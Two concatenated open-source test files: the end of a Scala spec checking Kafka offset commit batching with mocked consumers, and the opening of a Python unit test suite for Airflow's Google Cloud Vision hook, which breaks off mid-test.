commitLog.calls.head match {
case (offsets, callback) => callback.onComplete(null, failure)
}
intercept[Exception] {
Await.result(done, remainingOrDefault)
} should be(failure)
Await.result(control.shutdown(), remainingOrDefault)
}
it should "collect commits to be sent to commitAsync" in assertAllStagesStopped {
val commitLog = new ConsumerMock.LogHandler()
val mock = new ConsumerMock[K, V](commitLog)
val (control, probe) = createCommittableSource(mock.mock)
.toMat(TestSink.probe)(Keep.both)
.run()
val count = 100
val msgs = (1 to count).map(createMessage)
mock.enqueue(msgs.map(toRecord))
probe.request(count.toLong)
val allCommits = Future.sequence(probe.expectNextN(count.toLong).map(_.committableOffset.commitInternal()))
withClue("the commits are aggregated to a low number of calls to commitAsync:") {
awaitAssert {
val callsToCommitAsync = commitLog.calls.size
callsToCommitAsync should be >= 1
callsToCommitAsync should be < count / 10
}
}
//emulate commit
commitLog.calls.foreach {
case (offsets, callback) => callback.onComplete(offsets.asJava, null)
}
allCommits.futureValue should have size (count.toLong)
control.shutdown().futureValue shouldBe Done
}
it should "support commit batching" in assertAllStagesStopped {
val commitLog = new ConsumerMock.LogHandler()
val mock = new ConsumerMock[K, V](commitLog)
val (control, probe) = createCommittableSource(mock.mock, topics = Set("topic1", "topic2"))
.toMat(TestSink.probe)(Keep.both)
.run()
val msgsTopic1 = (1 to 3).map(createMessage(_, "topic1"))
val msgsTopic2 = (11 to 13).map(createMessage(_, "topic2"))
mock.enqueue(msgsTopic1.map(toRecord))
mock.enqueue(msgsTopic2.map(toRecord))
probe.request(100)
val batch = probe
.expectNextN(6)
.map(_.committableOffset)
.foldLeft(CommittableOffsetBatch.empty)(_.updated(_))
val done = batch.commitInternal()
awaitAssert {
commitLog.calls should have size (1)
}
val commitMap = commitLog.calls.head._1
commitMap(new TopicPartition("topic1", 1)).offset should ===(msgsTopic1.last.record.offset() + 1)
commitMap(new TopicPartition("topic2", 1)).offset should ===(msgsTopic2.last.record.offset() + 1)
//emulate commit
commitLog.calls.foreach {
case (offsets, callback) => callback.onComplete(offsets.asJava, null)
}
Await.result(done, remainingOrDefault)
Await.result(control.shutdown(), remainingOrDefault)
}
it should "support commit batching with metadata" in assertAllStagesStopped {
val commitLog = new ConsumerMock.LogHandler()
val mock = new ConsumerMock[K, V](commitLog)
val (control, probe) = createSourceWithMetadata(mock.mock,
(rec: ConsumerRecord[K, V]) => rec.offset.toString,
topics = Set("topic1", "topic2"))
.toMat(TestSink.probe)(Keep.both)
.run()
val msgsTopic1 = (1 to 3).map(createMessage(_, "topic1"))
val msgsTopic2 = (11 to 13).map(createMessage(_, "topic2"))
mock.enqueue(msgsTopic1.map(toRecord))
mock.enqueue(msgsTopic2.map(toRecord))
probe.request(100)
val batch = probe
.expectNextN(6)
.map(_.committableOffset)
.foldLeft(CommittableOffsetBatch.empty)(_.updated(_))
val done = batch.commitInternal()
awaitAssert {
commitLog.calls should have size (1)
}
val commitMap = commitLog.calls.head._1
commitMap(new TopicPartition("topic1", 1)).offset should ===(msgsTopic1.last.record.offset() + 1)
commitMap(new TopicPartition("topic2", 1)).offset should ===(msgsTopic2.last.record.offset() + 1)
commitMap(new TopicPartition("topic1", 1)).metadata() should ===(msgsTopic1.last.record.offset().toString)
commitMap(new TopicPartition("topic2", 1)).metadata() should ===(msgsTopic2.last.record.offset().toString)
//emulate commit
commitLog.calls.foreach {
case (offsets, callback) => callback.onComplete(offsets.asJava, null)
}
Await.result(done, remainingOrDefault)
Await.result(control.shutdown(), remainingOrDefault)
}
it should "support merging commit batches with metadata" in assertAllStagesStopped {
val commitLog = new ConsumerMock.LogHandler()
val mock = new ConsumerMock[K, V](commitLog)
val (control, probe) = createSourceWithMetadata(mock.mock,
(rec: ConsumerRecord[K, V]) => rec.offset.toString,
topics = Set("topic1", "topic2"))
.toMat(TestSink.probe)(Keep.both)
.run()
val msgsTopic1 = (1 to 3).map(createMessage(_, "topic1"))
val msgsTopic2 = (11 to 13).map(createMessage(_, "topic2"))
mock.enqueue(msgsTopic1.map(toRecord))
mock.enqueue(msgsTopic2.map(toRecord))
probe.request(100)
val batch = probe
.expectNextN(6)
.map(_.committableOffset)
.grouped(2)
.map(_.foldLeft(CommittableOffsetBatch.empty)(_ updated _))
.foldLeft(CommittableOffsetBatch.empty)(_ updated _)
val done = batch.commitInternal()
awaitAssert {
commitLog.calls should have size (1)
}
val commitMap = commitLog.calls.head._1
commitMap(new TopicPartition("topic1", 1)).offset should ===(msgsTopic1.last.record.offset() + 1)
commitMap(new TopicPartition("topic2", 1)).offset should ===(msgsTopic2.last.record.offset() + 1)
commitMap(new TopicPartition("topic1", 1)).metadata() should ===(msgsTopic1.last.record.offset().toString)
commitMap(new TopicPartition("topic2", 1)).metadata() should ===(msgsTopic2.last.record.offset().toString)
//emulate commit
commitLog.calls.foreach {
case (offsets, callback) => callback.onComplete(offsets.asJava, null)
}
Await.result(done, remainingOrDefault)
Await.result(control.shutdown(), remainingOrDefault)
}
//FIXME looks like current implementation of batch committer is incorrect
it should "support commit batching from more than one stage" in assertAllStagesStopped {
val commitLog1 = new ConsumerMock.LogHandler()
val commitLog2 = new ConsumerMock.LogHandler()
val mock1 = new ConsumerMock[K, V](commitLog1)
val mock2 = new ConsumerMock[K, V](commitLog2)
val (control1, probe1) = createCommittableSource(mock1.mock, "group1", Set("topic1", "topic2"))
.toMat(TestSink.probe)(Keep.both)
.run()
val (control2, probe2) = createCommittableSource(mock2.mock, "group2", Set("topic1", "topic3"))
.toMat(TestSink.probe)(Keep.both)
.run()
val msgs1a = (1 to 3).map(createMessage(_, "topic1", "group1"))
val msgs1b = (11 to 13).map(createMessage(_, "topic2", "group1"))
mock1.enqueue(msgs1a.map(toRecord))
mock1.enqueue(msgs1b.map(toRecord))
val msgs2a = (1 to 3).map(createMessage(_, "topic1", "group2"))
val msgs2b = (11 to 13).map(createMessage(_, "topic3", "group2"))
mock2.enqueue(msgs2a.map(toRecord))
mock2.enqueue(msgs2b.map(toRecord))
probe1.request(100)
probe2.request(100)
val batch1 = probe1
.expectNextN(6)
.map(_.committableOffset)
.foldLeft(CommittableOffsetBatch.empty)(_.updated(_))
val batch2 = probe2
.expectNextN(6)
.map(_.committableOffset)
.foldLeft(batch1)(_.updated(_))
val done2 = batch2.commitInternal()
awaitAssert {
commitLog1.calls should have size (1)
commitLog2.calls should have size (1)
}
val commitMap1 = commitLog1.calls.head._1
commitMap1(new TopicPartition("topic1", 1)).offset should ===(msgs1a.last.record.offset() + 1)
commitMap1(new TopicPartition("topic2", 1)).offset should ===(msgs1b.last.record.offset() + 1)
val commitMap2 = commitLog2.calls.head._1
commitMap2(new TopicPartition("topic1", 1)).offset should ===(msgs2a.last.record.offset() + 1)
commitMap2(new TopicPartition("topic3", 1)).offset should ===(msgs2b.last.record.offset() + 1)
//emulate commit
commitLog1.calls.foreach {
case (offsets, callback) => callback.onComplete(offsets.asJava, null)
}
commitLog2.calls.foreach {
case (offsets, callback) => callback.onComplete(offsets.asJava, null)
}
Await.result(done2, remainingOrDefault)
Await.result(control1.shutdown(), remainingOrDefault)
Await.result(control2.shutdown(), remainingOrDefault)
}
// Same logic as "support commit batching with metadata" above
"Tell committing" should "support commit batching with metadata" in assertAllStagesStopped {
val commitLog = new ConsumerMock.LogHandler()
val mock = new ConsumerMock[K, V](commitLog)
val (control, probe) = createSourceWithMetadata(mock.mock,
(rec: ConsumerRecord[K, V]) => rec.offset.toString,
topics = Set("topic1", "topic2"))
.toMat(TestSink.probe)(Keep.both)
.run()
val msgsTopic1 = (1 to 3).map(createMessage(_, "topic1"))
val msgsTopic2 = (11 to 13).map(createMessage(_, "topic2"))
mock.enqueue(msgsTopic1.map(toRecord))
mock.enqueue(msgsTopic2.map(toRecord))
probe.request(100)
val batch = probe
.expectNextN(6)
.map(_.committableOffset)
.foldLeft(CommittableOffsetBatch.empty)(_.updated(_))
batch.tellCommit()
awaitAssert {
commitLog.calls should have size (1)
}
val commitMap = commitLog.calls.head._1
commitMap(new TopicPartition("topic1", 1)).offset should ===(msgsTopic1.last.record.offset() + 1)
commitMap(new TopicPartition("topic2", 1)).offset should ===(msgsTopic2.last.record.offset() + 1)
commitMap(new TopicPartition("topic1", 1)).metadata() should ===(msgsTopic1.last.record.offset().toString)
commitMap(new TopicPartition("topic2", 1)).metadata() should ===(msgsTopic2.last.record.offset().toString)
//emulate commit
commitLog.calls.foreach {
case (offsets, callback) => callback.onComplete(offsets.asJava, null)
}
Await.result(control.shutdown(), remainingOrDefault)
}
"Committer.flow" should "fail in case of an exception during commit" in assertAllStagesStopped {
val committerSettings = CommitterSettings(system)
.withMaxBatch(1L)
val commitLog = new internal.ConsumerMock.LogHandler()
val mock = new ConsumerMock[K, V](commitLog)
val msg = createMessage(1)
mock.enqueue(List(toRecord(msg)))
val (control, probe) = createCommittableSource(mock.mock)
.map(_.committableOffset)
.toMat(Committer.sink(committerSettings))(Keep.both)
.run()
awaitAssert {
commitLog.calls should have size 1
}
emulateFailedCommit(commitLog)
probe.failed.futureValue shouldBe a[CommitFailedException]
control.shutdown().futureValue shouldBe Done
}
it should "recover with supervision in case of commit fail" in assertAllStagesStopped {
val committerSettings = CommitterSettings(system)
.withMaxBatch(1L)
val commitLog = new ConsumerMock.LogHandler()
val mock = new ConsumerMock[K, V](commitLog)
val msg = createMessage(1)
mock.enqueue(List(toRecord(msg)))
val resumeOnCommitFailed: Supervision.Decider = {
case _: CommitFailedException => Supervision.Resume
case _ => Supervision.Stop
}
val (control, probe) = createCommittableSource(mock.mock)
.map(_.committableOffset)
.toMat(
Committer
.sink(committerSettings)
.withAttributes(ActorAttributes.supervisionStrategy(resumeOnCommitFailed))
)(Keep.both)
.run()
awaitAssert {
commitLog.calls should have size 1
}
emulateFailedCommit(commitLog)
control.shutdown().futureValue shouldBe Done
probe.futureValue shouldBe Done
}
private def emulateFailedCommit(commitLog: ConsumerMock.LogHandler): Unit = {
val failure = new CommitFailedException()
commitLog.calls.head match {
case (_, callback) => callback.onComplete(null, failure)
}
}
}
| softwaremill/reactive-kafka | tests/src/test/scala/akka/kafka/internal/CommittingWithMockSpec.scala | Scala | apache-2.0 | 19,063 |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
from unittest import mock
import pytest
from google.cloud.vision import enums
from google.cloud.vision_v1 import ProductSearchClient
from google.cloud.vision_v1.proto.image_annotator_pb2 import (
AnnotateImageResponse,
EntityAnnotation,
SafeSearchAnnotation,
)
from google.cloud.vision_v1.proto.product_search_service_pb2 import Product, ProductSet, ReferenceImage
from google.protobuf.json_format import MessageToDict
from parameterized import parameterized
from airflow.exceptions import AirflowException
from airflow.providers.google.cloud.hooks.vision import ERR_DIFF_NAMES, ERR_UNABLE_TO_CREATE, CloudVisionHook
from tests.providers.google.cloud.utils.base_gcp_mock import mock_base_gcp_hook_default_project_id
PROJECT_ID_TEST = 'project-id'
PROJECT_ID_TEST_2 = 'project-id-2'
LOC_ID_TEST = 'loc-id'
LOC_ID_TEST_2 = 'loc-id-2'
PRODUCTSET_ID_TEST = 'ps-id'
PRODUCTSET_ID_TEST_2 = 'ps-id-2'
PRODUCTSET_NAME_TEST = f'projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/productSets/{PRODUCTSET_ID_TEST}'
PRODUCT_ID_TEST = 'p-id'
PRODUCT_ID_TEST_2 = 'p-id-2'
PRODUCT_NAME_TEST = f"projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/products/{PRODUCT_ID_TEST}"
PRODUCT_NAME = f"projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/products/{PRODUCT_ID_TEST}"
REFERENCE_IMAGE_ID_TEST = 'ri-id'
REFERENCE_IMAGE_GEN_ID_TEST = 'ri-id'
ANNOTATE_IMAGE_REQUEST = {
'image': {'source': {'image_uri': "gs://bucket-name/object-name"}},
'features': [{'type': enums.Feature.Type.LOGO_DETECTION}],
}
BATCH_ANNOTATE_IMAGE_REQUEST = [
{
'image': {'source': {'image_uri': "gs://bucket-name/object-name"}},
'features': [{'type': enums.Feature.Type.LOGO_DETECTION}],
},
{
'image': {'source': {'image_uri': "gs://bucket-name/object-name"}},
'features': [{'type': enums.Feature.Type.LOGO_DETECTION}],
},
]
REFERENCE_IMAGE_NAME_TEST = (
f"projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/products/"
f"{PRODUCTSET_ID_TEST}/referenceImages/{REFERENCE_IMAGE_ID_TEST}"
)
REFERENCE_IMAGE_TEST = ReferenceImage(name=REFERENCE_IMAGE_GEN_ID_TEST)
REFERENCE_IMAGE_WITHOUT_ID_NAME = ReferenceImage()
DETECT_TEST_IMAGE = {"source": {"image_uri": "https://foo.com/image.jpg"}}
DETECT_TEST_ADDITIONAL_PROPERTIES = {"test-property-1": "test-value-1", "test-property-2": "test-value-2"}
class TestGcpVisionHook(unittest.TestCase):
def setUp(self):
with mock.patch(
'airflow.providers.google.cloud.hooks.vision.CloudVisionHook.__init__',
new=mock_base_gcp_hook_default_project_id,
):
self.hook = CloudVisionHook(gcp_conn_id='test')
@mock.patch(
"airflow.providers.google.cloud.hooks.vision.CloudVisionHook.client_info",
new_callable=mock.PropertyMock,
)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook._get_credentials")
@mock.patch("airflow.providers.google.cloud.hooks.vision.ProductSearchClient")
def test_product_search_client_creation(self, mock_client, mock_get_creds, mock_client_info):
result = self.hook.get_conn()
mock_client.assert_called_once_with(
credentials=mock_get_creds.return_value, client_info=mock_client_info.return_value
)
assert mock_client.return_value == result
assert self.hook._client == result
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_create_productset_explicit_id(self, get_conn):
# Given
create_product_set_method = get_conn.return_value.create_product_set
create_product_set_method.return_value = None
parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
product_set = ProductSet()
# When
result = self.hook.create_product_set(
location=LOC_ID_TEST,
product_set_id=PRODUCTSET_ID_TEST,
product_set=product_set,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
# Then
# ProductSet ID was provided explicitly in the method call above, should be returned from the method
assert result == PRODUCTSET_ID_TEST
create_product_set_method.assert_called_once_with(
parent=parent,
product_set=product_set,
product_set_id=PRODUCTSET_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_create_productset_autogenerated_id(self, get_conn):
# Given
autogenerated_id = 'autogen-id'
response_product_set = ProductSet(
name=ProductSearchClient.product_set_path(PROJECT_ID_TEST, LOC_ID_TEST, autogenerated_id)
)
create_product_set_method = get_conn.return_value.create_product_set
create_product_set_method.return_value = response_product_set
parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
product_set = ProductSet()
# When
result = self.hook.create_product_set(
location=LOC_ID_TEST, product_set_id=None, product_set=product_set, project_id=PROJECT_ID_TEST
)
# Then
# ProductSet ID was not provided in the method call above. Should be extracted from the API response
# and returned.
assert result == autogenerated_id
create_product_set_method.assert_called_once_with(
parent=parent,
product_set=product_set,
product_set_id=None,
retry=None,
timeout=None,
metadata=None,
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_create_productset_autogenerated_id_wrong_api_response(self, get_conn):
# Given
response_product_set = None
create_product_set_method = get_conn.return_value.create_product_set
create_product_set_method.return_value = response_product_set
parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
product_set = ProductSet()
# When
with pytest.raises(AirflowException) as ctx:
self.hook.create_product_set(
location=LOC_ID_TEST,
product_set_id=None,
product_set=product_set,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
# Then
# API response was wrong (None) and thus ProductSet ID extraction should fail.
err = ctx.value
assert 'Unable to get name from response...' in str(err)
create_product_set_method.assert_called_once_with(
parent=parent,
product_set=product_set,
product_set_id=None,
retry=None,
timeout=None,
metadata=None,
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_get_productset(self, get_conn):
# Given
name = ProductSearchClient.product_set_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCTSET_ID_TEST)
response_product_set = ProductSet(name=name)
get_product_set_method = get_conn.return_value.get_product_set
get_product_set_method.return_value = response_product_set
# When
response = self.hook.get_product_set(
location=LOC_ID_TEST, product_set_id=PRODUCTSET_ID_TEST, project_id=PROJECT_ID_TEST
)
# Then
assert response
assert response == MessageToDict(response_product_set)
get_product_set_method.assert_called_once_with(name=name, retry=None, timeout=None, metadata=None)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_update_productset_no_explicit_name(self, get_conn):
# Given
product_set = ProductSet()
update_product_set_method = get_conn.return_value.update_product_set
update_product_set_method.return_value = product_set
productset_name = ProductSearchClient.product_set_path(
PROJECT_ID_TEST, LOC_ID_TEST, PRODUCTSET_ID_TEST
)
# When
result = self.hook.update_product_set(
location=LOC_ID_TEST,
product_set_id=PRODUCTSET_ID_TEST,
product_set=product_set,
update_mask=None,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
# Then
assert result == MessageToDict(product_set)
update_product_set_method.assert_called_once_with(
product_set=ProductSet(name=productset_name),
metadata=None,
retry=None,
timeout=None,
update_mask=None,
)
@parameterized.expand([(None, None), (None, PRODUCTSET_ID_TEST), (LOC_ID_TEST, None)])
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_update_productset_no_explicit_name_and_missing_params_for_constructed_name(
self, location, product_set_id, get_conn
):
# Given
update_product_set_method = get_conn.return_value.update_product_set
update_product_set_method.return_value = None
product_set = ProductSet()
# When
with pytest.raises(AirflowException) as ctx:
self.hook.update_product_set(
location=location,
product_set_id=product_set_id,
product_set=product_set,
update_mask=None,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
err = ctx.value
assert err
assert ERR_UNABLE_TO_CREATE.format(label='ProductSet', id_label='productset_id') in str(err)
update_product_set_method.assert_not_called()
@parameterized.expand([(None, None), (None, PRODUCTSET_ID_TEST), (LOC_ID_TEST, None)])
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_update_productset_explicit_name_missing_params_for_constructed_name(
self, location, product_set_id, get_conn
):
# Given
explicit_ps_name = ProductSearchClient.product_set_path(
PROJECT_ID_TEST_2, LOC_ID_TEST_2, PRODUCTSET_ID_TEST_2
)
product_set = ProductSet(name=explicit_ps_name)
update_product_set_method = get_conn.return_value.update_product_set
update_product_set_method.return_value = product_set
# When
result = self.hook.update_product_set(
location=location,
product_set_id=product_set_id,
product_set=product_set,
update_mask=None,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
# Then
assert result == MessageToDict(product_set)
update_product_set_method.assert_called_once_with(
product_set=ProductSet(name=explicit_ps_name),
metadata=None,
retry=None,
timeout=None,
update_mask=None,
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_update_productset_explicit_name_different_from_constructed(self, get_conn):
# Given
update_product_set_method = get_conn.return_value.update_product_set
update_product_set_method.return_value = None
explicit_ps_name = ProductSearchClient.product_set_path(
PROJECT_ID_TEST_2, LOC_ID_TEST_2, PRODUCTSET_ID_TEST_2
)
product_set = ProductSet(name=explicit_ps_name)
template_ps_name = ProductSearchClient.product_set_path(
PROJECT_ID_TEST, LOC_ID_TEST, PRODUCTSET_ID_TEST
)
# When
# Location and product_set_id are passed in addition to a ProductSet with an explicit name,
# but both names differ (constructed != explicit).
# Should throw AirflowException in this case.
with pytest.raises(AirflowException) as ctx:
self.hook.update_product_set(
location=LOC_ID_TEST,
product_set_id=PRODUCTSET_ID_TEST,
product_set=product_set,
update_mask=None,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
err = ctx.value
# self.assertIn("The required parameter 'project_id' is missing", str(err))
assert err
assert (
ERR_DIFF_NAMES.format(
explicit_name=explicit_ps_name,
constructed_name=template_ps_name,
label="ProductSet",
id_label="productset_id",
)
in str(err)
)
update_product_set_method.assert_not_called()
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_delete_productset(self, get_conn):
# Given
delete_product_set_method = get_conn.return_value.delete_product_set
delete_product_set_method.return_value = None
name = ProductSearchClient.product_set_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCTSET_ID_TEST)
# When
response = self.hook.delete_product_set(
location=LOC_ID_TEST, product_set_id=PRODUCTSET_ID_TEST, project_id=PROJECT_ID_TEST
)
# Then
assert response is None
delete_product_set_method.assert_called_once_with(name=name, retry=None, timeout=None, metadata=None)
@mock.patch(
'airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn',
**{'return_value.create_reference_image.return_value': REFERENCE_IMAGE_TEST},
)
def test_create_reference_image_explicit_id(self, get_conn):
# Given
create_reference_image_method = get_conn.return_value.create_reference_image
# When
result = self.hook.create_reference_image(
project_id=PROJECT_ID_TEST,
location=LOC_ID_TEST,
product_id=PRODUCT_ID_TEST,
reference_image=REFERENCE_IMAGE_WITHOUT_ID_NAME,
reference_image_id=REFERENCE_IMAGE_ID_TEST,
)
# Then
# Product ID was provided explicitly in the method call above, should be returned from the method
assert result == REFERENCE_IMAGE_ID_TEST
create_reference_image_method.assert_called_once_with(
parent=PRODUCT_NAME,
reference_image=REFERENCE_IMAGE_WITHOUT_ID_NAME,
reference_image_id=REFERENCE_IMAGE_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
@mock.patch(
'airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn',
**{'return_value.create_reference_image.return_value': REFERENCE_IMAGE_TEST},
)
def test_create_reference_image_autogenerated_id(self, get_conn):
# Given
create_reference_image_method = get_conn.return_value.create_reference_image
# When
result = self.hook.create_reference_image(
project_id=PROJECT_ID_TEST,
location=LOC_ID_TEST,
product_id=PRODUCT_ID_TEST,
reference_image=REFERENCE_IMAGE_TEST,
reference_image_id=REFERENCE_IMAGE_ID_TEST,
)
# Then
# Product ID was provided explicitly in the method call above, should be returned from the method
assert result == REFERENCE_IMAGE_GEN_ID_TEST
create_reference_image_method.assert_called_once_with(
parent=PRODUCT_NAME,
reference_image=REFERENCE_IMAGE_TEST,
reference_image_id=REFERENCE_IMAGE_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_add_product_to_product_set(self, get_conn):
# Given
add_product_to_product_set_method = get_conn.return_value.add_product_to_product_set
# When
self.hook.add_product_to_product_set(
product_set_id=PRODUCTSET_ID_TEST,
product_id=PRODUCT_ID_TEST,
location=LOC_ID_TEST,
project_id=PROJECT_ID_TEST,
)
# Then
# Product ID was provided explicitly in the method call above, should be returned from the method
add_product_to_product_set_method.assert_called_once_with(
name=PRODUCTSET_NAME_TEST, product=PRODUCT_NAME_TEST, retry=None, timeout=None, metadata=None
)
# remove_product_from_product_set
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_remove_product_from_product_set(self, get_conn):
# Given
remove_product_from_product_set_method = get_conn.return_value.remove_product_from_product_set
# When
self.hook.remove_product_from_product_set(
product_set_id=PRODUCTSET_ID_TEST,
product_id=PRODUCT_ID_TEST,
location=LOC_ID_TEST,
project_id=PROJECT_ID_TEST,
)
# Then
# Product ID was provided explicitly in the method call above, should be returned from the method
remove_product_from_product_set_method.assert_called_once_with(
name=PRODUCTSET_NAME_TEST, product=PRODUCT_NAME_TEST, retry=None, timeout=None, metadata=None
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client')
def test_annotate_image(self, annotator_client_mock):
# Given
annotate_image_method = annotator_client_mock.annotate_image
# When
self.hook.annotate_image(request=ANNOTATE_IMAGE_REQUEST)
# Then
# Product ID was provided explicitly in the method call above, should be returned from the method
annotate_image_method.assert_called_once_with(
request=ANNOTATE_IMAGE_REQUEST, retry=None, timeout=None
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client')
def test_batch_annotate_images(self, annotator_client_mock):
# Given
batch_annotate_images_method = annotator_client_mock.batch_annotate_images
# When
self.hook.batch_annotate_images(requests=BATCH_ANNOTATE_IMAGE_REQUEST)
# Then
# Product ID was provided explicitly in the method call above, should be returned from the method
batch_annotate_images_method.assert_called_once_with(
requests=BATCH_ANNOTATE_IMAGE_REQUEST, retry=None, timeout=None
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_create_product_explicit_id(self, get_conn):
# Given
create_product_method = get_conn.return_value.create_product
create_product_method.return_value = None
parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
product = Product()
# When
result = self.hook.create_product(
location=LOC_ID_TEST, product_id=PRODUCT_ID_TEST, product=product, project_id=PROJECT_ID_TEST
)
# Then
# Product ID was provided explicitly in the method call above, should be returned from the method
assert result == PRODUCT_ID_TEST
create_product_method.assert_called_once_with(
parent=parent,
product=product,
product_id=PRODUCT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_create_product_autogenerated_id(self, get_conn):
# Given
autogenerated_id = 'autogen-p-id'
response_product = Product(
name=ProductSearchClient.product_path(PROJECT_ID_TEST, LOC_ID_TEST, autogenerated_id)
)
create_product_method = get_conn.return_value.create_product
create_product_method.return_value = response_product
parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
product = Product()
# When
result = self.hook.create_product(
location=LOC_ID_TEST, product_id=None, product=product, project_id=PROJECT_ID_TEST
)
# Then
# Product ID was not provided in the method call above. Should be extracted from the API response
# and returned.
assert result == autogenerated_id
create_product_method.assert_called_once_with(
parent=parent, product=product, product_id=None, retry=None, timeout=None, metadata=None
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_create_product_autogenerated_id_wrong_name_in_response(self, get_conn):
# Given
wrong_name = 'wrong_name_not_a_correct_path'
response_product = Product(name=wrong_name)
create_product_method = get_conn.return_value.create_product
create_product_method.return_value = response_product
parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
product = Product()
# When
with pytest.raises(AirflowException) as ctx:
self.hook.create_product(
location=LOC_ID_TEST, product_id=None, product=product, project_id=PROJECT_ID_TEST
)
# Then
# API response was wrong (wrong name format) and thus ProductSet ID extraction should fail.
err = ctx.value
assert 'Unable to get id from name' in str(err)
create_product_method.assert_called_once_with(
parent=parent, product=product, product_id=None, retry=None, timeout=None, metadata=None
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_create_product_autogenerated_id_wrong_api_response(self, get_conn):
# Given
response_product = None
create_product_method = get_conn.return_value.create_product
create_product_method.return_value = response_product
parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
product = Product()
# When
with pytest.raises(AirflowException) as ctx:
self.hook.create_product(
location=LOC_ID_TEST, product_id=None, product=product, project_id=PROJECT_ID_TEST
)
# Then
# API response was wrong (None) and thus ProductSet ID extraction should fail.
err = ctx.value
assert 'Unable to get name from response...' in str(err)
create_product_method.assert_called_once_with(
parent=parent, product=product, product_id=None, retry=None, timeout=None, metadata=None
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_update_product_no_explicit_name(self, get_conn):
# Given
product = Product()
update_product_method = get_conn.return_value.update_product
update_product_method.return_value = product
product_name = ProductSearchClient.product_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCT_ID_TEST)
# When
result = self.hook.update_product(
location=LOC_ID_TEST,
product_id=PRODUCT_ID_TEST,
product=product,
update_mask=None,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
# Then
assert result == MessageToDict(product)
update_product_method.assert_called_once_with(
product=Product(name=product_name), metadata=None, retry=None, timeout=None, update_mask=None
)
@parameterized.expand([(None, None), (None, PRODUCT_ID_TEST), (LOC_ID_TEST, None)])
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_update_product_no_explicit_name_and_missing_params_for_constructed_name(
self, location, product_id, get_conn
):
# Given
update_product_method = get_conn.return_value.update_product
update_product_method.return_value = None
product = Product()
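        # Each parameterized case leaves out location and/or product_id, so the hook cannot construct
        # the product name and should raise before calling the API (see assert_not_called below).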
# When
with pytest.raises(AirflowException) as ctx:
self.hook.update_product(
location=location,
product_id=product_id,
product=product,
update_mask=None,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
err = ctx.value
assert err
assert ERR_UNABLE_TO_CREATE.format(label='Product', id_label='product_id') in str(err)
update_product_method.assert_not_called()
@parameterized.expand([(None, None), (None, PRODUCT_ID_TEST), (LOC_ID_TEST, None)])
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_update_product_explicit_name_missing_params_for_constructed_name(
self, location, product_id, get_conn
):
# Given
explicit_p_name = ProductSearchClient.product_path(
